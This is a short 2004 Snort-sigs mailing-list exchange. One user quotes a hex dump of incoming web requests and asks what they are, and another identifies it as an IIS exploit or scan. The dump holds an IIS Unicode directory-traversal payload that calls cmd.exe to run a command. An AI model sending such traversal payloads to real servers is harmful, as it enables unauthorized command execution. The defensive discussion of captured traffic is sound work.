[Snort-sigs] Weird new CMD.EXE payload...

Roach4 ml at ...2320...
Wed Jun 16 07:55:01 EDT 2004


Hi Jared,

This simply looks like an IIS exploit... either it's a scan or a specific
vulnerable string against your web server.

Good luck,

David



>
> I'm seeing a lot of this this morning. Weird patterns too.. One attempt
> from
> each source address They keep pouring in ...
>
> Any thoughts??
>
> 000 : 67 65 74 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   get /scripts/..%
> 010 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25   c0%af..%c0%af..%
> 020 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25   c0%af..%c0%af..%
> 030 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25   c0%af..%c0%af..%
> 040 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2F 77 69   c0%af..%c0%af/wi
> 050 : 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64   nnt/system32/cmd
> 060 : 2E 65 78 65 3F 2F 63 25 32 30 64 69 72 0D 0A      .exe?/c%20dir..
>
>
> Jared Kalisz
> Prodika
> 1245 South Main Street, 2nd Floor
> Grapevine, Texas
> Tel 817.488.3080
> Fax 817.488.7060
>
>
>
>
>
> -------------------------------------------------------
> This SF.Net email is sponsored by The 2004 JavaOne(SM) Conference
> Learn from the experts at JavaOne(SM), Sun's Worldwide Java Developer
> Conference, June 28 - July 1 at the Moscone Center in San Francisco, CA
> REGISTER AND SAVE! http://java.sun.com/javaone/sf Priority Code NWMGYKND
> _______________________________________________
> Snort-sigs mailing list
> Snort-sigs at lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/snort-sigs
>





More information about the Snort-sigs mailing list